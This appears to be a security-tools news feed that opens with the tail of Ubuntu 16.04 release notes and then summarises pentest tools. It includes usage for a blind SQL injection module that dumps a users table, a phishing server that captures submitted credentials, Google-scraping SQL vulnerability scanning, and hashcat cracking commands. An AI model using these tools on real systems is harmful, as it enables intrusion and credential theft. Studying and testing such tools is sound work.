Python2 is not installed anymore by default on the server, cloud and the touch images, long live Python3! Python3 itself has been upgraded to the 3.5 series.
If you have your own programs based on Python 2, fear not! Python 2 will continue to be available (as the python package) for the foreseeable future. However, to best support future versions of Ubuntu you should consider porting your code to Python 3. Python/3 has some advice and resources on this.

VIM defaults to python3

The default VIM package has been built against python3 instead of python2. This means plugins that require a python2 interpreter support from VIM will not work anymore. For this case alternative VIM packages are available that still use python2, for example vim-gnome-py2. They can be made the default via the alternatives mechanism:
  • sudo update-alternatives --set vim /usr/bin/vim.gnome-py2

Golang 1.6

golang toolchain was upgraded to the 1.6 series, and gccgo was upgraded to the GCC 6.1 release candidate 1. Thus the same level of standard library and compiler features are provided by both compilers on all fully supported architectures.

OpenSSH 7.2p2

Recent OpenSSH releases disable several pieces of weak, legacy, and/or unsafe cryptography. If you are upgrading a system remotely over SSH, you should check that you are not relying on these to ensure that you will retain access after the upgrade.
  • Support for the legacy SSH version 1 protocol is disabled by default at compile time. Note that this also means that the Cipher keyword in ssh_config(5) is effectively no longer usable; use Ciphers instead for protocol 2. The openssh-client-ssh1 package includes "ssh1", "scp1", and "ssh-keygen1" binaries which you can use if you have no alternative way to connect to an outdated SSH1-only server; please contact the server administrator or system vendor in such cases and ask them to upgrade.
  • Support for the 1024-bit diffie-hellman-group1-sha1 key exchange is disabled by default at run-time. It may be re-enabled using the upstream instructions.
  • Support for ssh-dss, ssh-dss-cert-* host and user keys is disabled by default at run-time. These may be re-enabled using the upstream instructions.
  • Support for the legacy v00 cert format has been removed.
  • Several ciphers are disabled by default in ssh: blowfish-cbc, cast128-cbc, all arcfour variants and the rijndael-cbc aliases for AES.
  • MD5-based and truncated HMAC algorithms are disabled by default in ssh.

GNU toolchain

glibc was updated to the 2.23 release, binutils to the 2.26 release, and GCC to a recent snapshot from the GCC 5 branch (post GCC 5.3.0).

Apt 1.2

Apt 1.2 includes the new privilege separation features introduced in Apt 1.1. Importantly, the unprivileged "_apt" user is now used when making outgoing network connections and parsing the results for the various apt transport methods (HTTP, HTTPS, FTP).

Ubuntu for IBM LinuxONE and z Systems

Ubuntu 16.04 LTS includes a new port to 64-bit z/Architecture for IBM mainframe computers. This is a practically complete port of Ubuntu Server and Cloud with circa 95% binary package availability. We are excited to enable OpenStack software, Juju, MAAS, LXD, and much more on this platform.
For more information about this port see S390X page.

Ubuntu Desktop

The general theme for 16.04 on the desktop is one of bug fixes and incremental quality improvements.

General

  • GNOME is mostly upgraded to 3.18. GLib upgraded to to 2.48 (corresponding to GNOME 3.20)
  • GNOME Software replaces Ubuntu Software Center. This brings a faster store experience and moves our archive metadata in line with Debian. It has been renamed "Ubuntu Software" to improve recognition for Ubuntu Software Center users.
  • All default applications and libraries ported to use WebKit 2
  • GNOME Calendar is now included by default
  • Empathy and Brasero are removed from the default installation
  • Chromium upgraded to version 48
  • Firefox upgraded to version 45
  • Online searches in the dash are now disabled by default
  • Improved HiDPI support in the greeter
  • Added more supported languages by default More info
  • Multiple bug fixes

Unity & Compiz

  • Improved launcher integration with file manager and devices
  • Support for formatting removable devices from quicklist
  • Improved support for gtk applications using headerbars
  • Improvements to the switcher and spread backends
  • Activate app spread by Super+Ctrl+W
  • Unity control center option to always show menus
  • Improvements to GNOME key grabbing
  • New dash overlay scrollbars
  • Better Dash theming support
  • Support for scaling cursors in HiDPI environments
  • Show icons launching state in launcher when apps launched elsewhere
  • Launcher can be moved to the bottom

LibreOffice

LibreOffice 5.1 brings a lot of improvements to the entire package. For more information on these improvements please see the LibreOffice release notes available here. You can see a video highlighting some of the new features here.

General

Writer word processor

Calc spreadsheets

  • Exponential and power trend lines handle negative Y values
  • Performance improvements leveraging SSE3 for SUM functions
  • Added support for PNG export
  • Search for numbers as formatted/displayed

Impress presentations

  • Slide transitions use OpenGL 2.1+ and new transitions added
  • Keyboard shortcuts for navigation and sorting
  • Screensaver inhibiting for KDE, XFCE, Mate

Ubuntu Server

General

New in 16.04, the kernel crash dump mechanism now supports remote kernel crash dumps. It is now possible to send kernel crash dumps to a remote server using the SSH or NFS protocols. Details of the new functionality are available in the Ubuntu Server Guide.

OpenStack Mitaka

Ubuntu 16.04 includes the latest OpenStack release, Mitaka, including the following components:
  • OpenStack Identity - Keystone
  • OpenStack Imaging - Glance
  • OpenStack Block Storage - Cinder
  • OpenStack Compute - Nova
  • OpenStack Networking - Neutron
  • OpenStack Telemetry - Ceilometer and Aodh
  • OpenStack Orchestration - Heat
  • OpenStack Dashboard - Horizon
  • OpenStack Object Storage - Swift
  • OpenStack Database as a Service - Trove
  • OpenStack DNS - Designate
  • OpenStack Bare-metal - Ironic
  • OpenStack Filesystem - Manila
  • OpenStack Key Manager - Barbican
Please refer to the OpenStack Mitaka release notes for full details of this release of OpenStack.
OpenStack Mitaka is also provided via the Ubuntu Cloud Archive for OpenStack Mitaka for Ubuntu 14.04 LTS users.
Ubuntu 16.04 also includes the first GA release of of the Nova driver for LXD ('nova-lxd').
WARNING: Upgrading an OpenStack deployment is a non-trivial process and care should be taken to plan and test upgrade procedures which will be specific to each OpenStack deployment.
Make sure you read the OpenStack Charm Release Notes for more information about how to deploy Ubuntu OpenStack using Juju.

libvirt 1.3.1

Libvirt has been updated to the 1.3.1 release.

qemu 2.5

Qemu has been updated to the 2.5 release.

Open vSwitch 2.5.0

Ubuntu 16.04 includes the latest release of Open vSwitch, 2.5.0. This is also an LTS release of Open vSwitch.
Ubuntu 16.04 also includes support for Open vSwitch integrated with DPDK (Data Plane Development Kit) enabling fast packet processing through userspace usage of compatible networking cards - see the openvswitch-switch-dpdk package for more details.

Ceph Jewel

Ubuntu 16.04 includes the latest release candidate (10.1.2) of the Ceph Jewel stable release; An update to the final release version will be delivered as an SRU to Ubuntu 16.04.
For full details on the Ceph Jewel release, please refer to the upstream release notes.

Nginx

Ubuntu 16.04 includes version 1.9.15 of the Nginx web server, with an expectation to provide the next stable release of Nginx, 1.10.0, as an SRU after release (which will be virtually identical to 1.9.15). This version of Nginx also includes HTTP/2 support, which supersedes SPDY support previously provided in the Nginx packages.

LXD 2.0

Ubuntu 16.04 LTS includes LXD, a new, lightweight, network-aware, container manager offering a VM-like experience built on top of Linux containers.
LXD comes pre-installed with all Ubuntu 16.04 server installations, including cloud images and can easily be installed on the Desktop version too. It can be used standalone through its simple command line client, through Juju to deploy your charms inside containers or with OpenStack for large scale deployments.
All the LXC components, LXC, LXCFS and LXD in Ubuntu 16.04 LTS are at version 2.0.
Learn more about LXD here: http://www.ubuntu.com/cloud/lxd/
And discover all the LXD 2.0 features with: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/

docker 1.10

docker was upgraded to the version 1.10. Note that this requires migration of existing images to a new format which will be performed on the first start of the service. This migration can take a long time and put a high load on the system, see https://docs.docker.com/engine/migration/ for more information.

PHP 7.0

PHP was upgraded to 7.0. Note that this will require modifications to custom PHP extensions (https://wiki.php.net/phpng-upgrading) and may require modifications to PHP source code (http://php.net/manual/en/migration70.php).
  • NGINX and PHP 7.0
Most PHP-dependent packages were either rebuilt or upgraded for PHP7.0 support. Where that was not possible, packages may have been removed from the archive. There was one exception, Drupal7.
  • Drupal7 does not pass upstream testing with PHP7.0 as of the 16.04 release (https://www.drupal.org/node/2656548). An SRU will be provided once upstream PHP7.0 support is available and verified. Until that time, the drupal7 package will not be installable in 16.04.

MySQL 5.7

MySQL has been updated to 5.7. Some configuration directives have been changed or deprecated, so if you are upgrading from a previously customised configuration then you will need to update your customisation appropriately. See bug 1571865 for details.
Password behaviour when the MySQL root password is empty has changed. Packaging now enables socket authentication when the MySQL root password is empty. This means that a non-root user can't log in as the MySQL root user with an empty password. For details, see the NEWS file.

Juju 2.0

Juju and Juju UI have been updated to 2.0beta4. The final Juju 2.0 release will come via an update post-release. The package name is juju-2.0. Juju 1.25.5 is available in the juju package for existing production environments. Please read the upgrade documentation before moving to 2.0
Juju now supports modelling workloads on AWS, Microsoft Azure, Google Cloud Engine, Rackspace, Joyent, LXD, MAAS, and manual deployments.



Get Ubuntu 16.04 LTS


Download Ubuntu 16.04 LTS


Images can be downloaded from a location near you.
You can download ISOs from:
http://releases.ubuntu.com/16.04/ (Ubuntu Desktop, Server, and Snappy Core

Upgrading from Ubuntu 14.04 LTS or 15.10

14.04 LTS to LTS upgrades will be enabled with 16.04.1 LTS release, in approximately 3 months time.
To upgrade on a desktop system:
  • Open the "Software & Updates" Setting in System Settings.
  • Select the 3rd Tab called "Updates".
  • Set the "Notify me of a new Ubuntu version" dropdown menu to "For any new version" if you are using 15.10, set it to "long-term support versions" if you are using 14.04 LTS.
  • Press Alt+F2 and type in "update-manager" (without the quotes) into the command box.
  • Software Updater should open up and tell you: New distribution release '16.04 LTS' is available.
  • Click Upgrade and follow the on-screen instructions.
To upgrade on a server system:
  • Install the update-manager-core package if it is not already installed.
  • Make sure the /etc/update-manager/release-upgrades is set to normal if you are using 15.10, lts if you are using 14.04 LTS.
  • Launch the upgrade tool with the command sudo do-release-upgrade.
  • Follow the on-screen instructions.
Note that the server upgrade will use GNU screen and automatically re-attach in case of dropped connection problems.
There are no offline upgrade options for Ubuntu Desktop and Ubuntu Server. Please ensure you have network connectivity to one of the official mirrors or to a locally accessible mirror and follow the instructions above. 

Alternative downloads

There are several other ways to get Ubuntu including torrents, which can potentially mean a quicker download, our network installer for older systems and special configurations and links to our regional DVD image mirrors for our older (and newer) releases. If you don’t specifically require any of these installers, we recommend using our default installers.

Network installer

The network installer lets you install Ubuntu over the network. This is useful, for example, if you have an old machine with a non-bootable CD-ROM or a computer that can’t run the graphical interface-based installer, either because they don’t meet the minimum requirements for the live CD/DVD or because they require extra configuration before the graphical desktop can be used, or if you want to install Ubuntu on a large number of computers at once.

BitTorrent

BitTorrent is a peer-to-peer download network that sometimes enables higher download speeds and more reliable downloads of large files. You will need to install a BitTorrent client on your computer in order to enable this download method.

Htcap - web application scanner able to crawl single page application (SPA) in a recursive manner by intercepting ajax calls and DOM changes

$
0
0

htcap is a web application scanner able to crawl single page application (SPA) in a recursive manner by intercepting ajax calls and DOM changes.

Htcap is not just another vulnerability scanner since it's focused mainly on the crawling process and uses external tools to discover vulnerabilities. It's designed to be a tool for both manual and automated penetration test of modern web applications.

The scan process is divided in two parts, first htcap crawls the target and collects as many requests as possible (urls, forms, ajax ecc..) and saves them to a sql-lite database. When the crawling is done it is possible to launch several security scanners against the saved requests and save the scan results to the same database.

When the database is populated (at least with crawing data), it's possible to explore it with ready-available tools such as sqlite3 or DBEaver or export the results in various formats using the built-in scripts.

QUICK START
Let's assume that we have to perform a penetration test against target.local, first we crawl the site:
$ htcap/htcap.py crawl target.local target.db
Once the crawl is done, the database (target.db) will contain all the requests discovered by the crawler. To explore/export the database we can use the built-in scripts or ready available tools.
For example, to list all discovered ajax calls we can use a single shell command:
$ echo "SELECT method,url,data FROM request WHERE type = 'xhr';" | sqlite3 target.db
Now that the site is crawled it's possible to launch several vulnerability scanners against the requests saved to the database. A scanner is an external program that can fuzz requests to spot security flaws.
Htcap uses a modular architecture to handle different scanners and execute them in a multi-threaded environment. For example we can run ten parallel instances of sqlmap against saved ajax requests with the following command:
$ htcap/htcap.py scan -r xhr -n 10 sqlmap target.db
Htcap comes with sqlmap and arachni modules built-in.
Sqlmap is used to discover SQL-Injection vulnerabilities and arachni is used to discover XSS, XXE, Code Executions, File Inclusions ecc.
Since scanner modules extend the BaseScanner class, they can be easly created or modified (see the section "Writing Scanner Modules" of this manual).
Htcap comes with several standalone scripts to export the crawl and scan results.
For example we can generate an interactive report containing the relevant informations about website/webapp with the command below.
Relevant informations will include, for example, the list of all pages that trigger ajax calls or websockets and the ones that contain vulnerabilities.
$ htcap/scripts/htmlreport.py target.db target.html
To scan a target with a single command use/modify the quickscan.sh script.
$ htcap/scripts/quickscan.sh https://target.local

SETUP

Requirements
  1. Python 2.7
  2. PhantomJS v2
  3. Sqlmap (for sqlmap scanner module)
  4. Arachni (for arachni scanner module)

Download and Run
$ git clone https://github.com/segment-srl/htcap.git htcap
$ htcap/htcap.py
Alternatively you can download the latest zip here .
PhantomJs can be downloaded here . It comes as a self-contained executable with all libraries linked statically, so there is no need to install or compile anything else.
Htcap will search for phantomjs executable in the locations listed below and in the paths listed in $PATH environment varailbe:
  1. ./
  2. /usr/bin/
  3. /usr/local/bin/
  4. /usr/share/bin/
To install htcap system-wide:
# mv htcap /usr/share/
# ln -s /usr/share/htcap/htcap.py /usr/local/bin/htcap
# ln -s /usr/share/htcap/scripts/htmlreport.py /usr/local/bin/htcap_report
# ln -s /usr/share/htcap/scripts/quickscan.sh /usr/local/bin/htcapquick

DEMOS
You can find an online demo of the html report here and a screenshot of the database view here
You can also explore the test pages here to see from what the report has been generated. They also include a page to test ajax recursion .

EXPLORING DATABASE
In order to read the database it's possible to use the built-in scripts or any ready-available
sqlite3 client.

BUILT-IN SCRIPT EXAMPLES
Generate the html report. (demo report available here )
$ htcap/scripts/htmlreport.py target.db target.html
List all pages that trigger ajax requests:
$ htcap/scripts/ajax.py target.db
Request ID: 6
Page URL: http://target.local/dashboard
Referer: http://target.local/
Ajax requests:
[BUTTON txt=Statistics].click() -> GET http://target.local/api/get_stats
List all discovered SQL-Injection vulnerabilities:
$ htcap/scripts/vulns.py target.db "type='sqli'"
C O M M A N D
python /usr/local/bin/sqlmap --batch -u http://target.local/api/[...]

D E T A I L S
Parameter: name (POST)
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: id=1' AND 4163=CAST [...]
[...]

QUERY EXAMPLES
Search for login forms
SELECT referer, method, url, data FROM request WHERE type='form' AND (url LIKE '%login%' OR data LIKE '%password%')
Search inside the pages html
SELECT url FROM request WHERE html LIKE '%upload%' COLLATE NOCASE

AJAX CRAWLING
Htcap features an algorithm able to crawl ajax-based pages in a recursive manner.
The algorithm works by capturing ajax calls, mapping DOM changes to them and repeat the process recursively against the newly added elements.
When a page is loaded htcap starts by triggering all events and filling input values in the aim to trigger ajax calls. When an ajax call is detected, htcap waits until it is completed and the relative callback is called; if, after that, the DOM is modified, htcap runs the same algorithm against the added elements and repeats it until all the ajax calls have been fired.
 _________________
| |
|load page content|
'--------,--------'
|
|
|
________V________
| interact with |
| new content |<-----------------------------------------+
'--------,--------' |
| |
| |
| | YES
______V______ ________________ ______l_____
/ AJAX \ YES | | / CONTENT \
{ TRIGGERED? }-------->| wait ajax |----->{ MODIFIED? }
\ ______ ______ / '----------------' \ ______ _____ /
| NO | NO
| |
| |
________V________ |
| | |
| return |<-----------------------------------------+
'-----------------'

COMMAND LINE ARGUMENTS
$ htcap crawl -h
usage: htcap [options] url outfile
Options:
-h this help
-w overwrite output file
-q do not display progress informations
-m MODE set crawl mode:
- passive: do not intract with the page
- active: trigger events
- aggressive: also fill input values and crawl forms (default)
-s SCOPE set crawl scope
- domain: limit crawling to current domain (default)
- directory: limit crawling to current directory (and subdirecotries)
- url: do not crawl, just analyze a single page
-D maximum crawl depth (default: 100)
-P maximum crawl depth for consecutive forms (default: 10)
-F even if in aggressive mode, do not crawl forms
-H save HTML generated by the page
-d DOMAINS comma separated list of allowed domains (ex *.target.com)
-c COOKIES cookies as json or name=value pairs separaded by semicolon
-C COOKIE_FILE path to file containing COOKIES
-r REFERER set initial referer
-x EXCLUDED comma separated list of urls to exclude (regex) - ie logout urls
-p PROXY proxy string protocol:host:port - protocol can be 'http' or 'socks5'
-n THREADS number of parallel threads (default: 10)
-A CREDENTIALS username and password used for HTTP authentication separated by a colon
-U USERAGENT set user agent
-t TIMEOUT maximum seconds spent to analyze a page (default 300)
-S skip initial url check
-G group query_string parameters with the same name ('[]' ending excluded)
-N don't normalize URL path (keep ../../)
-R maximum number of redirects to follow (default 10)
-I ignore robots.txt



Metaphor - Stagefright with ASLR bypass

$
0
0

Metaphor - Stagefright with ASLR bypass By Hanan Be'er from NorthBit Ltd.


Metaphor's source code is now released! The source include a PoC that generates MP4 exploits in real-time and bypassing ASLR. The PoC includes lookup tables for Nexus 5 Build LRX22C with Android 5.0.1. Server-side of the PoC include simple PHP scripts that run the exploit generator - I'm using XAMPP to serve gzipped MP4 files. The attack page is index.php.

The exploit generator is written in Python and used by the PHP code.
usage: metaphor.py [-h] [-c CONFIG] -o OUTPUT {leak,rce,suicide} ...

positional arguments:
{leak,rce,suicide} Type of exploit to generate

optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
Override exploit configuration
-o OUTPUT, --output OUTPUT
Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosting this project to achieve all the goals.


IPGeoLocation - A tool to retrieve IP Geolocation information

$
0
0

A tool to retrieve IP Geolocation information
Powered by ip-api

Requirements
Python 3.x

Features
  • Retrieve IP or Domain Geolocation.
  • Retrieve your own IP Geolocation.
  • Retrieve Geolocation for IPs or Domains loaded from file. Each target in new line.
  • Define your own custom User Agent string.
  • Select random User-Agent strings from file. Each User Agent string in new line.
  • Proxy support.
  • Select random proxy from file. Each proxy URL in new line.
  • Open IP geolocation in Google Maps using the default browser.
  • Export results to csv, xml and txt format.

Geolocation Information
  • ASN
  • City
  • Country
  • Country Code
  • ISP
  • Latitude
  • Longtitude
  • Organization
  • Region Code
  • Region Name
  • Timezone
  • Zip Code

Usage
$ ./ip2geolocation.py
usage: ipgeolocation.py [-h] [-m] [-t TARGET] [-T file] [-u User-Agent]
[-U file] [-g] [--noprint] [-v] [--nolog] [-x PROXY]
[-X file] [-e file] [-ec file] [-ex file]

IPGeolocation 2.0.3

--[ Retrieve IP Geolocation information from ip-api.com
--[ Copyright (c) 2015-2016 maldevel (@maldevel)
--[ ip-api.com service will automatically ban any IP addresses doing over 150 requests per minute.

optional arguments:
-h, --help show this help message and exit
-m, --my-ip Get Geolocation info for my IP address.
-t TARGET, --target TARGET
IP Address or Domain to be analyzed.
-T file, --tlist file
A list of IPs/Domains targets, each target in new line.
-u User-Agent, --user-agent User-Agent
Set the User-Agent request header (default: IP2GeoLocation 2.0.3).
-U file, --ulist file
A list of User-Agent strings, each string in new line.
-g Open IP location in Google maps with default browser.
--noprint IPGeolocation will print IP Geolocation info to terminal. It is possible to tell IPGeolocation n
ot to print results to terminal with this option.
-v, --verbose Enable verbose output.
--nolog IPGeolocation will save a .log file. It is possible to tell IPGeolocation not to save those log
files with this option.
-x PROXY, --proxy PROXY
Setup proxy server (example: http://127.0.0.1:8080)
-X file, --xlist file
A list of proxies, each proxy url in new line.
-e file, --txt file Export results.
-ec file, --csv file Export results in CSV format.
-ex file, --xml file Export results in XML format.

Examples
Retrieve your IP Geolocation
  • ./ip2geolocation.py -m
Retrieve IP Geolocation
  • ./ip2geolocation.py -t x.x.x.x
Retrieve Domain Geolocation
  • ./ip2geolocation.py -t example.com
Do not save .log files
  • ./ip2geolocation.py -t example.com --nolog
Custom User Agent string
  • ./ip2geolocation.py -t x.x.x.x -u "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"
Using Proxy
Using random Proxy
  • ./ip2geolocation.py -t x.x.x.x -X /path/to/proxies/filename.txt
Pick User-Agent string randomly
  • ./ip2geolocation.py -t x.x.x.x -U /path/to/user/agent/strings/filename.txt
Retrieve IP geolocation and open location in Google maps with default browser
  • ./ip2geolocation.py -t x.x.x.x -g
Export results to CSV file
  • ./ip2geolocation.py -t x.x.x.x --csv /path/to/results.csv
Export results to XML file
  • ./ip2geolocation.py -t x.x.x.x --xml /path/to/results.xml
Export results to TXT file
  • ./ip2geolocation.py -t x.x.x.x -e /path/to/results.txt
Retrieve IP Geolocation for many targets
  • ./ip2geolocation.py -T /path/to/targets/targets.txt
Retrieve IP Geolocation for many targets and export results to xml
  • ./ip2geolocation.py -T /path/to/targets/targets.txt --xml /path/to/results.xml
Do not print results to terminal
  • ./ip2geolocation.py -m -e /path/to/results.txt --noprint


PenQ - The Security Testing Browser Bundle

$
0
0

PenQ is an open source Linux based penetration testing browser bundle built over Mozilla Firefox. It comes pre-configured with security tools for spidering, advanced web searching, fingerprinting, anonymous browsing, web server scanning, fuzzing, report generating and many more. PenQ is not just a mix of addons but it comes preconfigured with some very powerful open source java/python and command line tools including Nikto, Wfuzz, OWASP Zap, OWASP Webslayer, OWASP WebScarab, Tor and lots more.

PenQ is configured to run on Debian based distributions including Ubuntu and its derivative distros, and penetration testing operating systems such as BackTrack and Kali. PenQ lets security testers access necessary system utilities and tools right from their browser, saving time and making tests a lot faster. Tools built-in range from those for anonymous browsing and system monitoring to ones for taking down notes and scheduling tasks.PenQ can save companies from huge investments in proprietary tools and over-sized testing team.


It also provides tutorials by linking to OWASP Testing Guide, a vast source of security testing related knowledge with a lost of useful resources and OWASP project. PenQ can be used to test the OWASP Top 10 risks to safeguard web applications against vulnerabilities.


Testing Solution for SMBs


A secure website is crucial to any online business - small, medium or enterprise scale. PenQ can save companies from huge investments in proprietary tools and over-sized testing teams. Integrated with resource links, security guidelines, and testing tools, PenQ empowers even less experienced testers to do a thorough job of checking for security loopholes.

A Slew of Tools


PenQ lets security testers access necessary system utilities and tools right from their browser, saving time and making tests a lot faster. Tools built-in range from those for anonymous browsing and system monitoring to ones for taking down notes and scheduling tasks. View the entire set of tools under features.

Debian Based


PenQ is configured to run on Debian based distributions including Ubuntu and its derivative distros, and penetration testing operating systems such as BackTrack and Kali.

With all its integrations, PenQ is a powerful tool. Be mindful of what use you put it to. Responsible use of PenQ can help secure web apps in a zap.

Features

  • OWASP ZAP
  • Wfuzz Web Application Fuzzer
  • PenTesting Report Generator
  • OWASP WebScarab
  • Mozilla Add-ons Collection
  • Vulnerability Databases Search
  • OWASP WebSlayer
  • Integrated Tor
  • Access to Shell and System Utilities
  • Nikto Web Server Scanner
  • OWASP Penetration Testing Checklist
  • Collection of Useful Links

Full List of Mozilla Add-ons


  • anonymoX 
  • Awesome Screenshot 
  • ChatZilla 
  • CipherFox 
  • Clear Console 
  • Cookies Manager+ 
  • Cookie Monster 
  • CryptoFox 
  • Email Extractor 
  • Firebug 
  • FireFlow 
  • FireFTP 
  • FireSSH 
  • Greasemonkey 
  • Groundspeed 
  • HackBar 
  • HackSearch 
  • Header Spy
  • HttpFox 
  • HttpRequester 
  • JavaScript Deobfuscator 
  • Library Detector 
  • LinkSidebar 
  • Proxy Selector
  • Proxy Tool
  • RefControl 
  • RESTClient
  • Session Manager
  • SQL Inject Me
  • SQLite Manager
  • TrashMail.net
  • User Agent Switcher
  • Wappalyzer
  • Web Developer
  • Xinha Here!
  • XSS Me

Tested on

  • Ubuntu 10.04
  • Ubuntu 10.10
  • Ubuntu 11.04
  • Ubuntu 11.10
  • Ubuntu 12.04
  • Ubuntu 12.10
  • Ubuntu 13.04
  • BackTrack R1
  • BackTrack R2
  • BackTrack R3
  • Debian6
  • Linux Mint
  • Kali Linux
  • Backbox


How to Install


Download the PenQ package. Open the command-line interface (CLI) and navigate to the location of the downloaded file.
cd [path to PenQ file]
Assign executable permission to this file.
chmod +x PenQ-installer-1.0.sh
Run PenQ installer file from CLI.
./PenQ-installer-1.0.sh
Provide sudo password and wait for installation to complete. Once installed, double-click the PenQ icon on desktop or open the terminal and run the following
penq

How to Uninstall 


Navigate to the PenQ folder
cd /usr/share/PenQ
Run the following command
sudo ./uninstallPenq 

Whitewidow - SQL Vulnerability Scanner

$
0
0

Whitewidow is an open source automated SQL vulnerability scanner, that is capable of running through a file list, or can scrape Google for potential vulnerable websites. It allows automatic file formatting, random user agents, IP addresses, server information, multiple SQL injection syntax, and a fun environment. This program was created for learning purposes, and is intended to teach users what vulnerability looks like.

Usage
ruby whitewidow.rb -h Will print the help page
ruby whitewidow.rb -e Will print the examples page
ruby whitewidow.rb -f <path/to/file> Will run Whitewidow through a file, you will not need to provide whitewidow the full path to the file, just provide it the paths within the whitewidow directory itself. Also you will not need a beginning slash, example:
- whitewidow.rb -f tmp/sites.txt #<= CORRECT
- whitewidow.rb -f /home/users/me/whitewidow-1.0.6/tmp/sites.txt #<= INCORRECT
ruby whitewidow.rb -d Will run whitewidow in default mode and scrape Google using the search queries in the lib directory

Dependencies
gem 'mechanize'
gem 'nokogiri', '~> 1.6.7.2'
gem 'rest-client'
gem 'colored'
To install all gem dependencies, follow the following template:
cd whitewidow
bundle install
This should install all gems needed, and will allow you to run the program without trouble.

Misc
Current Version 1.0.6.1
Future updates:
  • Custom user agent
  • Webcrawler to search specified site for vulnerabilities
  • Will be moving all .rb extension files into lib/core directory
  • Advanced searching, meaning multiple pages of Google, along with multiple parameter checking.
  • Ability to detect database type.
  • Using multiple search engines, such as DuckDuckGo, Google, Bing, Yahoo. This will prevent one search engine from taking the multiple searches as a threat and will give further anomity to the program. I will also be adding IP anomity with a built in proxy feature. This feature will ALWAYS be on, and will have a flag (--no-proxy) so That you can decide to not use a proxy.


Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting

$
0
0

This is a module that performs blind SQL injection by using the bitshifting method to calculate characters instead of guessing them. It requires 7/8 requests per character, depending on the configuration.

Usage
import blind-sql-bitshifting as x

# Edit this dictionary to configure attack vectors
x.options

Example configuration:
# Vulnerable link
x.options["target"] = "http://www.example.com/index.php?id=1"

# Specify cookie (optional)
x.options["cookies"] = ""

# Specify a condition for a specific row, e.g. 'uid=1' for admin (optional)
x.options["row_condition"] = ""

# Boolean option for following redirections
x.options["follow_redirections"] = 0

# Specify user-agent
x.options["user_agent"] = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Specify table to dump
x.options["table_name"] = "users"

# Specify columns to dump
x.options["columns"] = "id, username"

# String to check for on page after successful statement
x.options["truth_string"] = "<p id='success'>true</p>"

# See below
x.options["assume_only_ascii"] = 1
The assume_only_ascii option makes the module assume that the characters it's dumping are all ASCII. Since the ASCII charset only goes up to 127 , we can set the first bit to 0 and not worry about calculating it. That's a 12.5% reduction in requests. Testing locally, this yeilded an average speed increase of 15% . Of course this can cause issues when dumping chars that are outside of the ASCII range. By default, it's set to 0 .
Once configured:
    x.exploit()   

This returns a 2-dimensional array, with each sub-array containing a single row, the first being the column headers.
Example output:
    [['id', 'username'], ['1', 'eclipse'], ['2', 'dotcppfile'], ['3', 'Acey'], ['4', 'Wardy'], ['5', 'idek']]   

Optionally, your scripts can then harness the tabulate module to output the data:
from tabulate import tabulate

data = x.exploit()

print tabulate(data,
headers='firstrow', # This specifies to use the first row as the column headers.
tablefmt='psql') # Using the SQL output format. Other formats can be used.
This would output:
+------+------------+
| id | username |
|------+------------|
| 1 | eclipse |
| 2 | dotcppfile |
| 3 | Acey |
| 4 | Wardy |
| 5 | idek |
+------+------------+


Weeman v1.7 - HTTP Server for Phishing

$
0
0

HTTP server for phishing in python. (and framework) Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).

Press
  • 1.7 - is out 25-03-2016
  • Added profiles
  • Weeman framework 0.1 is out !!!
  • Added command line options.
  • Beautifulsoup dependency removed.

Weeman will do the following steps:
  1. Create fake html page.
  2. Wait for clients
  3. Grab the data (POST).
  4. Try to login the client to the original page

The framework
You can use weeman with modules see examples in modules/ , just run the command framework to access the framework.

Write a module for the framework
If you want to write a module please read the modules/. Soon I will write docs for the API.

Profiles
You can load profiles in weeman, for example profile for mobile site and profile for desktop site.
./weeman.py -p mobile.localhost.profile

Requirements
  • Python <= 2.7.

Platforms
  • Linux (any)
  • Mac (Tested)
  • Windows (Not supported)

Contributing
Contributions are very welcome!
  1. fork the repository
  2. clone the repo (git clone git@github.com :USERNAME/weeman.git)
  3. make your changes
  4. Add yourself in contributors.txt
  5. push the repository
  6. make a pull request
Thank you - and happy contributing!


Hob0Rules - Password cracking rules for Hashcat based on statistics and industry patterns

$
0
0

Password cracking rules for Hashcat based on statistics and industry patterns. The following blog posts on passwords explain the statistical signifigance of these rulesets:

Useful wordlists to utilize with these rules have been included in the wordlists directory
Uncompress these with the unfollowing command
gunzip rockyou.txt.gz

hob064
This ruleset contains 64 of the most frequent password patterns used to crack passwords. Need a hash cracked quickly to move on to more testing? Use this list.
hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/rockyou.txt -r hob064.rule -o cracked.txt

d3adhob0
This ruleset is much more extensive and utilizes many common password structure ideas seen across every industry. Looking to spend several hours to crack many more hashes? Use this list.
hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/english.txt -r d3adhob0.rule -o cracked.txt


BlackArch Linux v2016.04.28 - Penetration Testing Distribution

$
0
0


BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1410tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

ChangeLog:

  • added new (improved) BlackArch Linux installer
  • include linux kernel 4.5.1
  • added new blackarch linux installer
  • fixed an EFI boot issue
  • fixed the well-known i686 boot issue
  • added more than 80 new tools
  • updated all blackarch tools
  • updated all system packages
  • updated menu entries for window managers (awesome, fluxbox, openbox)

Installing on top of ArchLinux

BlackArch Linux is compatible with existing/normal Arch installations. It acts as an unofficial user repository. Below you will find instructions on how to install BlackArch in this manner.
# Run https://blackarch.org/strap.sh as root and follow the instructions.
$ curl -O https://blackarch.org/strap.sh

# The SHA1 sum should match: 86eb4efb68918dbfdd1e22862a48fda20a8145ff
$ sha1sum strap.sh

# Set execute bit
$ chmod +x strap.sh

# Run strap.sh
$ sudo ./strap.sh

You may now install tools from the blackarch repository.
# To list all of the available tools, run
$ sudo pacman -Sgg | grep blackarch | cut -d' ' -f2 | sort -u

# To install all of the tools, run
$ sudo pacman -S blackarch

# To install a category of tools, run
$ sudo pacman -S blackarch-<category>

# To see the blackarch categories, run
$ sudo pacman -Sg | grep blackarch

As part of an alternative method of installation, you can build the blackarch packages from source. You can find the PKGBUILDs on github. To build the entire repo, you can use the blackman tool.
# First, you must install blackman.
If the BlackArch package repository is setup on your machine,

# you can install blackman like:
